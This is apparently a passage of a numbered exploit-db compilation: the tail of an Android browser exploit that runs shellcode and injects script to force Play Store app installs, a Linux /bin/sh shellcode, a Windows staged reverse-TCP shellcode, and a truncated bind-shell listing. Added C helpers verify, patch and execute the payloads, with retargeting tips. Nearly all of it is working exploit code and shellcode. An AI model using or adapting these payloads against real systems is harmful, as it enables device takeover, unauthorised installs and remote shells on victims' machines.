var arrayBuffer = new ArrayBuffer(0x1000000);
var arrayBufferAddress = getObjAddr(arrayBuffer)-1;
var backingStoreAddress = read_uint32(arrayBufferAddress+4*4);
var args_address = backingStoreAddress+1024;
function write_shellcode(dlsym_addr,buffer){
  //ldr r0,[pc,4]//0xe59f0004
  //ldr r1,[pc,4]//0xe59f1004
  //b shellcode;//0xea000001
  //dlopen_addr//array_buffer_address
  //dlsym_addr
  //shellcode
  //var stub=[0xe59f0004,0xe59f1004,0xea000001,dlsym_addr+0xc,dlsym_addr];
  var stub=[0xe59f0004,0xe59f1004,0xea000001,args_address,0x1000000];
  for(var i=0;i<stub.length;i++){
    globaldv[buffer/4+i]=stub[i];
  }
  shellcode = shellcode.concat([0,0,0,0]);
  for(var i=0;i<shellcode.length/4>>>0;i++){
    // u8arr[i+4*stub.length]=shellcode[i];
    globaldv[buffer/4+stub.length+i] = (shellcode[4*i+3]<<24)+(shellcode[4*i+2]<<16)+(shellcode[4*i+1]<<8)+(shellcode[4*i]);
  }
  return stub.length*4+shellcode.length;
}
function xss_code(){
  //alert(navigator.userAgent);
  //alert(document.cookie);
  var i1=setInterval(function(){
    if(!(document&&document.body&&document.body.innerHTML&&document.body.innerHTML.match(/This app is compatible/)!=null)){
      console.log("wait load complete");
      return;
    }
    clearInterval(i1);
    var i2=setInterval(function(){
      document.getElementsByClassName("price buy id-track-click")[0].click();
      var installButton = document.getElementById("purchase-ok-button");
      if(installButton == null) return;
      installButton.click();
      document.write("<h1>The app will be installed shortly, Pwned by 360 Alpha Team</h1>");
      clearInterval(i2);
      setTimeout(function(){
        window.open("intent://scan/#Intent;scheme=zxing;package=com.google.zxing.client.android;end");
      },26000);
    },500);
  },500);
}
var js_str="\n"+xss_code.toString()+"xss_code();\n";
//var backup_arr = backup_original_code(huge_func_code_entry);
var writed_len = write_shellcode(dlsym_addr,huge_func_code_entry);
var args_view = new DataView(arrayBuffer,1024,100);
var so_file_view = new DataView(arrayBuffer,4096);
var js_view = new DataView(arrayBuffer,0x100000);
args_view.setUint32(0,dlsym_addr+0xc,true);
args_view.setUint32(4,dlsym_addr,true);
args_view.setUint32(8,huge_func_code_entry,true);
args_view.setUint32(12,writed_len,true);
args_view.setUint32(16,backingStoreAddress+4096,true);
args_view.setUint32(20,so_str.length/2,true);
args_view.setUint32(24,backingStoreAddress+0x100000,true);
args_view.setUint32(28,js_str.length,true);
print("length is "+so_str.length);
for(var i=0;i<so_str.length;i+=2){
  var value = so_str.substr(i,2);
  value = "0x"+value;
  so_file_view.setUint8(i/2,parseInt(value));
}
for(var i=0;i<js_str.length;i++){
  js_view.setUint8(i,js_str.charCodeAt(i));
}
print("begin execute shellcode");
huge_func({});
print("done");
postMessage(true);
//prevent arrayBuffer to be released
while(1){}
}
//main world
function print(){
  console.log.apply(null,arguments);
  document.write('<p >');
  document.write.apply(document,arguments);
  document.write("<p>");
}
// Build a worker from an anonymous function body
var blobURL = URL.createObjectURL( new Blob([ '(',exploit.toString(),')()' ], { type: 'application/javascript' } ) );
var worker;
var exploitSucc = false;
var count = 0;
function startExploit(){
  print("worker thread is started");
  worker = new Worker( blobURL );
  count++;
  worker.onmessage = function(e){
    print("exploit result is "+e.data);
    exploitSucc = e.data;
    if(exploitSucc==false){
      startExploit();
      return;
    }
    var end = +new Date();
    print("time diff is "+(end-begin)/1000);
    //top.location='https://play.google.com/store/apps/details?id=com.google.zxing.client.android';
    top.location='https://play.google.com/store/apps/details?id=com.kitkats.qrscanner';
  }
}
var begin = +new Date();
startExploit();
var savedCount = 0;
var hangMonitor = setInterval(function (){
  if(exploitSucc==true){
    clearInterval(hangMonitor);
  }else{
    if(savedCount==count){//maybe hang
      print("worker maybe hange");
      worker.terminate();
      startExploit();
    }else{
      print("worker is normal");
      savedCount = count;
    }
  }
},10000);
//URL.revokeObjectURL( blobURL );
</script>
</html>
Source: https://www.exploit-db.com/exploits/42175/. Platform: Android.
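The exploit above ships its second-stage payload as an ARM shared object in the hex string so_str, which the shellcode writes into the ArrayBuffer and hands to the linker. Before running a PoC like this, the first thing to do is look at what that blob actually is. The following is an added example (it is not part of the 360 Alpha Team exploit): it parses the ELF32 header and program headers out of the first 327 bytes of so_str as printed on this page and pulls out the machine type, the PT_INTERP path and the segment flags. The little-endian readers are hand-written so the check runs on any host.

```c
/* Added example, not from the exploit above: inspect the ELF32 image in so_str. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* First 327 bytes of so_str copied from the page: ELF header, the eight
   program headers, and the PT_INTERP string they point at (offset 0x134). */
static const char so_hex[] =
    "7f454c46010101000000000000000000"   /* e_ident: ELF, ELFCLASS32, LSB */
    "03002800010000000000000034000000"   /* e_type e_machine e_version e_entry e_phoff */
    "44110000000000053400200008002800"   /* e_shoff e_flags e_ehsize e_phentsize e_phnum e_shentsize */
    "15001400"                           /* e_shnum e_shstrndx */
    "0600000034000000340000003400000000010000000100000400000004000000" /* PT_PHDR */
    "0300000034010000340100003401000013000000130000000400000001000000" /* PT_INTERP */
    "01000000000000000000000000000000d80d0000d80d00000500000000100000" /* PT_LOAD r-x */
    "01000000a40e0000a41e0000a41e00006c010000820100000600000000100000" /* PT_LOAD rw- */
    "02000000a80e0000a81e0000a81e000028010000280100000600000004000000" /* PT_DYNAMIC */
    "51e5746400000000000000000000000000000000000000000600000000000000" /* PT_GNU_STACK */
    "01000070d40c0000d40c0000d40c000020000000200000000400000004000000" /* PT_ARM_EXIDX */
    "52e57464a40e0000a41e0000a41e00005c0100005c0100000600000004000000" /* PT_GNU_RELRO */
    "2f73797374656d2f62696e2f6c696e6b657200";                          /* "/system/bin/linker\0" */

typedef struct {
    uint16_t e_type, e_machine, e_phnum;
    uint32_t e_entry, e_phoff;
    uint32_t text_flags;          /* p_flags of the first PT_LOAD */
    char interp[64];
} so_info;

static so_info g_so;              /* filled by inspect_so_str() */

static int hexval(char c) {
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Decodes a hex string into out; stops at the first non-hex pair. */
static size_t unhex(const char *hex, uint8_t *out, size_t max) {
    size_t n = 0;
    for (; hex[0] && hex[1] && n < max; hex += 2) {
        int hi = hexval(hex[0]), lo = hexval(hex[1]);
        if (hi < 0 || lo < 0) break;
        out[n++] = (uint8_t)(hi << 4 | lo);
    }
    return n;
}

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | p[1] << 8); }
static uint32_t rd32(const uint8_t *p) {
    return p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Parses an ELF32 little-endian header and its program headers.
   Returns 0 on success, a negative code for a malformed image. */
int parse_elf32(const uint8_t *b, size_t n, so_info *o) {
    memset(o, 0, sizeof *o);
    if (n < 52 || memcmp(b, "\x7f" "ELF", 4) != 0) return -1;
    if (b[4] != 1 || b[5] != 1) return -2;            /* ELFCLASS32, ELFDATA2LSB */
    o->e_type = rd16(b + 16);
    o->e_machine = rd16(b + 18);
    o->e_entry = rd32(b + 24);
    o->e_phoff = rd32(b + 28);
    uint16_t phentsize = rd16(b + 42);
    o->e_phnum = rd16(b + 44);
    if (phentsize != 32 || (uint64_t)o->e_phoff + 32u * o->e_phnum > n) return -3;
    for (unsigned i = 0; i < o->e_phnum; i++) {
        const uint8_t *ph = b + o->e_phoff + 32 * i;
        uint32_t type = rd32(ph), off = rd32(ph + 4), filesz = rd32(ph + 16), flags = rd32(ph + 24);
        if (type == 3) {                                  /* PT_INTERP */
            if (filesz == 0 || filesz > sizeof o->interp || (uint64_t)off + filesz > n) return -4;
            memcpy(o->interp, b + off, filesz);
            o->interp[filesz - 1] = '\0';
        } else if (type == 1 && o->text_flags == 0) {     /* first PT_LOAD */
            o->text_flags = flags;
        }
    }
    return 0;
}

/* Decodes so_hex into g_so; returns parse_elf32's result. */
int inspect_so_str(void) {
    uint8_t buf[512];
    size_t n = unhex(so_hex, buf, sizeof buf);
    return parse_elf32(buf, n, &g_so);
}

int main(void) {
    if (inspect_so_str() != 0) { puts("not a parsable ELF32 image"); return 1; }
    printf("e_type=%u e_machine=%u (40 = ARM) e_entry=0x%x phnum=%u\n",
           g_so.e_type, g_so.e_machine, g_so.e_entry, g_so.e_phnum);
    printf("PT_INTERP=%s  first PT_LOAD flags=%u (5 = r-x)\n", g_so.interp, g_so.text_flags);
    return 0;
}
```

For this payload the parse reports an ET_DYN ARM object with no entry point, an r-x PT_LOAD and /system/bin/linker as interpreter, which is consistent with the shellcode's dlopen/dlsym route: the object is loaded by the platform linker and its so_main symbol is called, rather than being jumped into directly.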
  15. /*
;Title: Linux/x86-64 - /bin/sh Shellcode
;Author: Touhid M.Shaikh
;Contact: https://github.com/touhidshaikh
;Category: Shellcode
;Architecture: Linux x86_64
;Description: This shellcode is based on the "JMP CALL POP" method to execute "/bin//sh". Length of shellcode is 31 bytes.
;Tested on : #1 SMP PREEMPT RT Debian 4.9.25-1kali1 (2017-05-04)

===COMPILATION AND EXECUTION===
#nasm -f elf64 shell.asm -o shell.o
#ld shell.o -o shell          <=== Making Binary File
#./bin2shell.sh shell         <== extract hex code from the binary (https://github.com/touhidshaikh/bin2shell)

=================SHELLCODE(INTEL FORMAT)=================
section .text
global _start

_start:
    jmp shell

here:
    xor rax,rax
    pop rdi
    xor rsi,rsi
    xor rdx,rdx
    add rax,59
    syscall

shell:
    call here
    bash db "/bin//sh"
===================END HERE============================

Compile with gcc with some options.
# gcc -fno-stack-protector -z execstack shell-testing.c -o shell-testing
*/
#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\xeb\x10\x48\x31\xc0\x5f\x48\x31\xf6\x48\x31\xd2\x48\x83\xc0\x3b\x0f\x05\xe8\xeb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x2f\x73\x68";

int main(void)
{
    printf("Touhid Shaikh (http://www.touhidshaikh.com)\n");
    printf("Shellcode Length : %d\n", (int)strlen((const char *)code));
    int (*ret)() = (int(*)())code;
    ret();
    return 0;
}
Source: https://www.exploit-db.com/exploits/42126/.
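Two things worth checking on a blob like this before it goes anywhere near a real target: whether it contains bytes the delivery path cannot carry (the reason the stub builds 59 with xor rax,rax / add rax,59 instead of mov rax,59 is to avoid NUL bytes), and how it gets executed. The post's harness relies on -z execstack, which makes the whole stack executable; an anonymous RWX mapping is the narrower alternative. The example below is added here and is not part of Touhid Shaikh's post. It also makes visible a detail the harness hides: the 31 bytes do not NUL-terminate "/bin//sh", so the C char array (or the zero-filled page here) is what supplies the terminator that execve needs.

```c
/* Added example, not from the post above: bad-byte scan and RWX loader
   for the 31-byte /bin//sh stub.  Linux-specific (mmap flags). */
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#ifndef MAP_ANONYMOUS
#define MAP_ANONYMOUS 0x20   /* Linux value, in case the headers hide it */
#endif

/* The 31 bytes from the post; the string literal adds a 32nd byte, a NUL. */
static const unsigned char sc[] =
    "\xeb\x10\x48\x31\xc0\x5f\x48\x31\xf6\x48\x31\xd2\x48\x83\xc0\x3b"
    "\x0f\x05\xe8\xeb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x2f\x73\x68";
static const size_t sc_len = sizeof sc - 1;

/* Bytes a strcpy-style or line-oriented sink will not carry intact. */
static const unsigned char default_bad[] = { 0x00, 0x0a, 0x0d };

/* Number of bytes of buf that fall in the bad set. */
size_t count_bad_bytes(const unsigned char *buf, size_t len,
                       const unsigned char *bad, size_t nbad) {
    size_t hits = 0;
    for (size_t i = 0; i < len; i++)
        for (size_t j = 0; j < nbad; j++)
            if (buf[i] == bad[j]) { hits++; break; }
    return hits;
}

size_t sc_bad_bytes(void) {
    return count_bad_bytes(sc, sc_len, default_bad, sizeof default_bad);
}

/* 1 if the last byte inside the blob is a NUL, i.e. the string the
   call/pop sequence points at is terminated within the shellcode itself. */
int ends_with_nul(const unsigned char *buf, size_t len) {
    return len > 0 && buf[len - 1] == 0;
}

/* Copies the blob into a zero-filled anonymous RWX mapping.  The zero fill
   supplies the NUL after "/bin//sh", as the char array in the post does.
   Returns the mapping (size via *mapped) or NULL. */
void *load_rwx(const unsigned char *buf, size_t len, size_t *mapped) {
    size_t size = (len + 4095) & ~(size_t)4095;
    void *mem = mmap(NULL, size, PROT_READ | PROT_WRITE | PROT_EXEC,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (mem == MAP_FAILED) return NULL;
    memset(mem, 0, size);
    memcpy(mem, buf, len);
    *mapped = size;
    return mem;
}

/* Maps, verifies the copy and the trailing NUL, unmaps; 1 on success. */
int sc_loads_cleanly(void) {
    size_t size;
    unsigned char *mem = load_rwx(sc, sc_len, &size);
    if (!mem) return 0;
    int ok = memcmp(mem, sc, sc_len) == 0 && mem[sc_len] == 0;
    munmap(mem, size);
    return ok;
}

int main(void) {
    printf("length %zu, bad bytes %zu, NUL inside blob: %s\n", sc_len,
           sc_bad_bytes(), ends_with_nul(sc, sc_len) ? "yes" : "no");
    if (sc_bad_bytes() != 0) return 1;
    size_t size;
    void *mem = load_rwx(sc, sc_len, &size);
    if (!mem) { perror("mmap"); return 1; }
    ((void (*)(void))mem)();   /* execve("/bin//sh") replaces this process */
    return 0;
}
```

Compile with a plain gcc invocation; no -z execstack or -fno-stack-protector is needed because the code never runs from the stack. If the target's injection point is a fixed-size buffer rather than a C string, add one explicit NUL to the payload yourself, because nothing there will do it for you.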
  16. ########### Windows x86 Reverse TCP Staged Alphanumeric Shellcode CreateProcessA cmd.exe ########
########### Author: Snir Levi, Applitects #############
## 332 Bytes ##
## For Educational Purposes Only ##
Date: 01.03.17
Author: Snir Levi
Email: snircontact@gmail.com
https://github.com/snir-levi/
IP - 127.0.0.1
PORT - 4444
Tested on: Windows 7, Windows 10

###Usage###
The victim executes the first stage shellcode, which opens a TCP connection.
After the connection is established, send the alphanumeric stage over the connection.

nc -lvp 4444
connect to [127.0.0.1] from localhost [127.0.0.1] (port)
RPhoceshtePrhCreaTQPXLLLLLLLLYFFFFPXNNNNj0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHPhessAhProchExitTQPXFFFFFFFFPXZZZZZZZZZZj0YIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIITXQQQQWWWQQBRQQQQQQQQQQjDTZhexeChcmd.TYPRj0ZJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJRRRBRJRRQRAAAAAAANNNNS
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Users\>
###########

##Shellcode##
#### Second Stage Alphanumeric shellcode: #####
RPhoceshtePrhCreaTQPXLLLLLLLLYFFFFPXNNNNj0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHPhessAhProchExitTQPXFFFFFFFFPXZZZZZZZZZZj0YIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIITXQQQQWWWQQBRQQQQQQQQQQjDTZhexeChcmd.TYPRj0ZJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJRRRBRJRRQRAAAAAAANNNNS

R       push edx
P       push eax
hoces   push 0x7365636f   //oces
htePr   push 0x72506574   //tePr
hCrea   push 0x61657243   //Crea
T       push esp
Q       push ecx
PX      will be replaced with call [esi] (0x16ff)
L*8     dec esp           // offset esp to kernel32.dll address
Y       pop ecx           // ecx = kernel32
F*4     inc esi           -> offset [esi+4]
PX      will be replaced with mov [esi],eax (0x0689)
N*4     dec esi           -> offset [esi]
j0      push 0x30
X       pop eax
H*48    dec eax           // zeroing eax
P       push eax
hessA   push 0x41737365   //essA (will be null terminated)
hProc   push 0x636f7250   //Proc
hExit   push 0x74697845   //Exit
T       push esp
Q       push ecx
PX      will be replaced with call [esi] (0x16ff)
F*8     inc esi           -> offset [esi+8]
PX      will be replaced with mov [esi],eax (0x0689)
Z*10    pop edx           // offset stack to &processinfo
j0      push 0x30
Y       pop ecx
I*48    dec ecx           // zeroing ecx
T       push esp
X       pop eax           // eax = &PROCESS_INFORMATION
Q*4     push ecx          // sub esp,16
W       push edi
W       push edi
W       push edi
Q       push ecx
Q       push ecx
B       inc edx
R       push edx
Q*10    push ecx
jD      push 0x44
T       push esp
Z       pop edx           // edx = &STARTUPINFOA
hexeC   push 0x43657865   //exeC
hcmd.   push 0x2e646d63   //cmd.
T       push esp          // &'cmd.exe'
Y       pop ecx
P       push eax          // &PROCESS_INFORMATION
R       push edx          // &STARTUPINFOA
j0      push 0x30
Z       pop edx
J*48    dec edx           // zeroing edx
R*3     push edx
B       inc edx
R       push edx
J       dec edx
R*2     push edx
Q       push ecx          ; &'cmd.exe'
R       push edx
A*7     inc ecx           // offset ecx to [C]exeh -> will be null terminated
N*4     dec esi           // offset [esi+4] to CreateProcessA
S       push ebx          ; return address

## First Stage Shellcode ##

global _start
section .text
_start:
    xor eax,eax
    push eax                ; null terminator for createProcA
    mov eax,[fs:eax+0x30]   ; Process Environment Block
    mov eax,[eax+0xc]
    mov esi,[eax+0x14]
    lodsd
    xchg esi,eax
    lodsd
    mov ebx,[eax+0x10]      ; kernel32
    mov ecx,[ebx+0x3c]      ; DOS->e_lfanew
    add ecx, ebx            ; Skip to PE start
    mov ecx, [ecx+0x78]     ; offset to export table
    add ecx,ebx             ; kernel32 image_export_dir
    mov esi,[ecx+0x20]      ; Name Table
    add esi,ebx
    xor edx,edx
getProcAddress:
    inc edx
    lodsd
    add eax,ebx
    cmp dword [eax],'GetP'
    jne getProcAddress
    cmp dword [eax+4],'rocA'
    jne getProcAddress
;---Function Addresses Chain----
;[esi]    GetProcAddress
;[esi+12] WSAstartup
;[esi+16] WSASocketA
;[esi+20] connect
;[esi+24] recv
;[esi+28] kernel32
;Alphanumeric stage store:
;[esi+4]  CreateProcessA
;[esi+8]  ExitProcess
    mov esi,[ecx+0x1c]      ; Functions Addresses Chain
    add esi,ebx
    mov edx,[esi+edx*4]
    add edx,ebx             ; GetProcAddress
    sub esp, 32             ; Buffer for the function addresses chain
    push esp
    pop esi
    mov [esp],edx           ; esi offset 0 -> GetProcAddress
    mov [esi+28],ebx        ; esi offset 28 -> kernel32
;--------winsock2.dll Address--------------
    xor edi,edi
    push edi
    push 0x41797261         ; Ayra
    push 0x7262694c         ; rbiL
    push 0x64616f4c         ; daoL
    push esp
    push ebx
    call [esi]
;-----ws2_32.dll Address-------
    xor ecx,ecx
    push ecx
    mov cx, 0x3233          ; 0023
    push ecx
    push 0x5f327377         ; _2sw
    push esp
    call eax
    mov ebp,eax             ; ebp = ws2_32.dll
;-------WSAstartup Address-------------
    xor ecx,ecx
    push ecx
    mov cx, 0x7075          ; 00up
    push ecx
    push 0x74726174         ; trat
    push 0x53415357         ; SASW
    push esp
    push ebp
    call [esi]
    mov [esi+12],eax        ; esi offset 12 -> WSAstartup
;-------WSASocketA Address-------------
    xor ecx,ecx
    push ecx
    mov cx, 0x4174          ; 00At
    push ecx
    push 0x656b636f         ; ekco
    push 0x53415357         ; SASW
    push esp
    push ebp
    call [esi]
    mov [esi+16],eax        ; esi offset 16 -> WSASocketA
;------connect Address-----------
    push edi
    mov ecx, 0x74636565     ; '\0tce'
    shr ecx, 8
    push ecx
    push 0x6e6e6f63         ; 'nnoc'
    push esp
    push ebp
    call [esi]
    mov [esi+20],eax        ; esi offset 20 -> connect
;------recv Address-------------
    push edi
    push 0x76636572         ; vcer
    push esp
    push ebp
    call [esi]
    mov [esi+24],eax        ; esi offset 24 -> recv
;------call WSAstartup()----------
    xor ecx,ecx
    sub sp,700
    push esp
    mov cx,514
    push ecx
    call [esi+12]
;--------call WSASocket()-----------
; WSASocket(AF_INET = 2, SOCK_STREAM = 1,
;           IPPROTO_TCP = 6, NULL,
;           (unsigned int)NULL, (unsigned int)NULL);
    push eax                ; if successful, eax = 0
    push eax
    push eax
    mov al,6
    push eax
    mov al,1
    push eax
    inc eax
    push eax
    call [esi+16]
    xchg eax, edi           ; edi = SocketReference
;--------call connect----------
;struct sockaddr_in {
;    short sin_family;
;    u_short sin_port;
;    struct in_addr sin_addr;
;    char sin_zero[8];
;};
    push byte 0x1
    pop edx
    shl edx, 24
    mov dl, 0x7f            ; edx = 127.0.0.1 (hex)
    push edx
    push word 0x5c11        ; port 4444
    push word 0x2
;int connect(
;    _In_ SOCKET s,
;    _In_ const struct sockaddr *name,
;    _In_ int namelen
;);
    mov edx,esp
    push byte 16            ; sizeof(sockaddr)
    push edx                ; (sockaddr*)
    push edi                ; socketReference
    call [esi+20]
;--------call recv()----------
;int recv(
;    _In_  SOCKET s,
;    _Out_ char *buf,
;    _In_  int len,
;    _In_  int flags
;);
stage:
    push eax
    mov ax,950
    push eax                ; buffer length
    push esp
    pop ebp
    sub ebp,eax             ; set buffer to [esp-950]
    push ebp                ; &buf
    push edi                ; socketReference
    call [esi+24]
executeStage:
    xor edx,edx
    mov byte [ebp+eax-1],0xc3   ; end of the Alphanumeric buffer -> ret
    mov byte [ebp+96],dl        ; null terminator to ExitProcess
    mov byte [ebp-1],0x5b       ; buffer start: pop ebx -> return address
    dec ebp
    mov word [ebp+20],0x16ff    ; call DWORD [esi]
    mov word [ebp+35],0x0689    ; mov [esi],eax
    mov word [ebp+110],0x16ff   ; call DWORD [esi]
    mov word [ebp+120],0x0689   ; mov [esi],eax
    mov ax,0x4173               ; As (CreateProcessA)
    mov ecx,[esi+28]            ; ecx = kernel32
    dec dl                      ; edx = 0x000000ff
    call ebp                    ; Execute Alphanumeric stage
executeShell:
    mov [ecx],dl                ; null terminator to 'cmd.exe'
    call dword [esi]            ; createProcA
    push eax
    call dword [esi+4]          ; ExitProcess

-----------------------

unsigned char shellcode[]=
"\x31\xc0\x50\x64\x8b\x40\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x4b\x3c\x01\xd9\x8b\x49\x78\x01\xd9\x8b\x71\x20\x01\xde\x31\xd2\x42\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x8b\x71\x1c\x01\xde\x8b\x14\x96\x01\xda\x83\xec\x20\x54\x5e\x89\x14\x24\x89\x5e\x1c\x31\xff\x57\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x53\xff\x16\x31\xc9\x51\x66\xb9\x33\x32\x51\x68\x77\x73\x32\x5f\x54\xff\xd0\x89\xc5\x31\xc9\x51\x66\xb9\x75\x70\x51\x68\x74\x61\x72\x74\x68\x57\x53\x41\x53\x54\x55\xff\x16\x89\x46\x0c\x31\xc9\x51\x66\xb9\x74\x41\x51\x68\x6f\x63\x6b\x65\x68\x57\x53\x41\x53\x54\x55\xff\x16\x89\x46\x10\x57\xb9\x65\x65\x63\x74\xc1\xe9\x08\x51\x68\x63\x6f\x6e\x6e\x54\x55\xff\x16\x89\x46\x14\x57\x68\x72\x65\x63\x76\x54\x55\xff\x16\x89\x46\x18\x31\xc9\x66\x81\xec\xf4\x01\x54\x66\xb9\x02\x02\x51\xff\x56\x0c\x50\x50\x50\xb0\x06\x50\xb0\x01\x50\x40\x50\xff\x56\x10\x97\x6a\x01\x5a\xc1\xe2\x18\xb2\x7f\x52\x66\x68\x11\x5c\x66\x6a\x02\x89\xe2\x6a\x10\x52\x57\xff\x56\x14\x50\x66\xb8\xb6\x03\x50\x54\x5d\x29\xc5\x55\x57\xff\x56\x18\x31\xd2\xc6\x44\x05\xff\xc3\x88\x55\x60\xc6\x45\xff\x5b\x4d\x66\xc7\x45\x14\xff\x16\x66\xc7\x45\x23\x89\x06\x66\xc7\x45\x6e\xff\x16\x66\xc7\x45\x78\x89\x06\x66\xb8\x73\x41\x8b\x4e\x1c\xfe\xca\xff\xd5\x88\x11\xff\x16\x50\xff\x56\x04";

Source: https://www.exploit-db.com/exploits/41481/.
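The interesting part of this design is the executeStage block: the received text is not executable as-is, the first stage rewrites it in place (four "PX" pairs become call [esi] / mov [esi],eax, the 'A' of "hessA" becomes the NUL of "ExitProcess", a pop ebx is prepended at [ebp-1] and the last received byte becomes ret). The example below is added here, it is not part of Snir Levi's post; it rebuilds the stage from the piece table in the listing and applies the same patches in C, so the second stage can be checked offline before a session is opened. One caveat it makes explicit: the byte that becomes ret is the last byte recv() returned, which in the nc session shown is the newline typed after the stage. Without that trailing newline the final "S" (push ebx) would itself be overwritten.

```c
/* Added example, not from the post above: offline model of executeStage. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define STAGE_MAX 950    /* recv() length used by the first stage (mov ax,950) */

/* The stage as the annotated listing describes it: text, repeat count. */
typedef struct { const char *s; int n; } piece;
static const piece stage_pieces[] = {
    {"RPhoceshtePrhCreaTQPX", 1}, {"L", 8}, {"Y", 1}, {"F", 4}, {"PX", 1},
    {"N", 4}, {"j0X", 1}, {"H", 48}, {"PhessAhProchExitTQPX", 1}, {"F", 8},
    {"PX", 1}, {"Z", 10}, {"j0Y", 1}, {"I", 48},
    {"TXQQQQWWWQQBRQQQQQQQQQQjDTZhexeChcmd.TYPRj0Z", 1}, {"J", 48},
    {"RRRBRJRRQRAAAAAAANNNNS", 1},
};

static unsigned char g_stage[STAGE_MAX + 2];   /* stage text + newline */
static unsigned char g_image[STAGE_MAX + 2];   /* pop ebx + patched stage */

/* Expands the piece table into out; returns the length, 0 if it does not fit. */
size_t build_stage(unsigned char *out, size_t max) {
    size_t len = 0;
    for (size_t i = 0; i < sizeof stage_pieces / sizeof *stage_pieces; i++)
        for (int r = 0; r < stage_pieces[i].n; r++) {
            size_t l = strlen(stage_pieces[i].s);
            if (len + l > max) return 0;
            memcpy(out + len, stage_pieces[i].s, l);
            len += l;
        }
    return len;
}

/* 1 if every byte survives a text channel (printable ASCII, no NUL/CR/LF)
   and the whole thing fits in the first stage's recv() buffer. */
int stage_is_sendable(const unsigned char *s, size_t n) {
    for (size_t i = 0; i < n; i++)
        if (s[i] < 0x20 || s[i] > 0x7e) return 0;
    return n > 0 && n <= STAGE_MAX;
}

/* Applies the executeStage patches to recvd (what recv() returned, i.e. the
   stage plus the newline nc sends).  out[0] is the pop ebx written at [ebp-1];
   the offsets are [ebp+20/35/110/120] after dec ebp and [ebp+96] before it.
   Returns the image length, 0 if the layout does not match the listing. */
size_t patch_stage(const unsigned char *recvd, size_t n, unsigned char *out, size_t max) {
    static const size_t px_off[] = { 19, 34, 109, 119 };
    static const unsigned char px_bytes[][2] = { {0xff,0x16}, {0x89,0x06}, {0xff,0x16}, {0x89,0x06} };
    if (n < 121 || n > STAGE_MAX || n + 1 > max) return 0;
    for (int i = 0; i < 4; i++)
        if (recvd[px_off[i]] != 'P' || recvd[px_off[i] + 1] != 'X') return 0;
    if (recvd[96] != 'A') return 0;          /* the 'A' of "hessA" */
    out[0] = 0x5b;                           /* pop ebx */
    unsigned char *b = out + 1;
    memcpy(b, recvd, n);
    b[n - 1] = 0xc3;                         /* mov byte [ebp+eax-1],0xc3 */
    b[96] = 0x00;                            /* mov byte [ebp+96],dl      */
    for (int i = 0; i < 4; i++) {            /* mov word [ebp+..],0x16ff / 0x0689 */
        b[px_off[i]] = px_bytes[i][0];
        b[px_off[i] + 1] = px_bytes[i][1];
    }
    return n + 1;
}

/* Builds, validates, appends the newline and patches; returns the image
   length (stage + newline + pop ebx) or 0 on any mismatch. */
size_t stage_roundtrip(void) {
    size_t n = build_stage(g_stage, STAGE_MAX);
    if (n == 0 || !stage_is_sendable(g_stage, n)) return 0;
    g_stage[n] = '\n';                       /* the Enter that ends the paste in nc */
    return patch_stage(g_stage, n + 1, g_image, sizeof g_image);
}

int main(void) {
    size_t m = stage_roundtrip();
    if (m == 0) { puts("stage layout mismatch"); return 1; }
    printf("stage %zu bytes, patched image %zu bytes, first=0x%02x last=0x%02x\n",
           m - 2, m, g_image[0], g_image[m - 1]);
    return 0;
}
```

When retargeting the first stage, keep the patch offsets in mind: anything inserted before offset 121 of the second stage shifts the "PX" markers and the 'A' terminator, and the fixed word writes in executeStage will then land inside other instructions.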
  17. The PDF is here. Source: exploit-db.com.
  18. ;The MIT License (MIT)
;Copyright (c) 2017 Robert L. Taylor
;Permission is hereby granted, free of charge, to any person obtaining a
;copy of this software and associated documentation files (the “Software”),
;to deal in the Software without restriction, including without limitation
;the rights to use, copy, modify, merge, publish, distribute, sublicense,
;and/or sell copies of the Software, and to permit persons to whom the
;Software is furnished to do so, subject to the following conditions:
;The above copyright notice and this permission notice shall be included
;in all copies or substantial portions of the Software.
;The Software is provided “as is”, without warranty of any kind, express or
;implied, including but not limited to the warranties of merchantability,
;fitness for a particular purpose and noninfringement. In no event shall the
;authors or copyright holders be liable for any claim, damages or other
;liability, whether in an action of contract, tort or otherwise, arising
;from, out of or in connection with the software or the use or other
;dealings in the Software.
;
; For a detailed explanation of this shellcode see my blog post:
; http://a41l4.blogspot.ca/2017/02/shellrandomlisten1434.html

global _start
section .text
_start:
    ; Socket
    push 41
    pop rax
    push 2
    pop rdi
    push 1
    pop rsi
    cdq
    syscall

    ; Listen
    xor esi,esi
    xchg eax,edi
    mov al,50
    syscall

    ; Accept
    mov al,43
    syscall

    ; Dup 2
    push 3
    pop rsi
    xchg edi,eax
dup2loop:
    push 33
    pop rax
    dec esi
    syscall
    jne dup2loop

    ; Execve
    ; rax and rsi and rdx are zero already
    push rax            ; zero terminator for the following string that we are pushing
    ; push /bin//sh in reverse
    mov rbx, '/bin//sh'
    push rbx
    ; store /bin//sh address in RDI
    push rsp
    pop rdi
    ; Call the Execve syscall
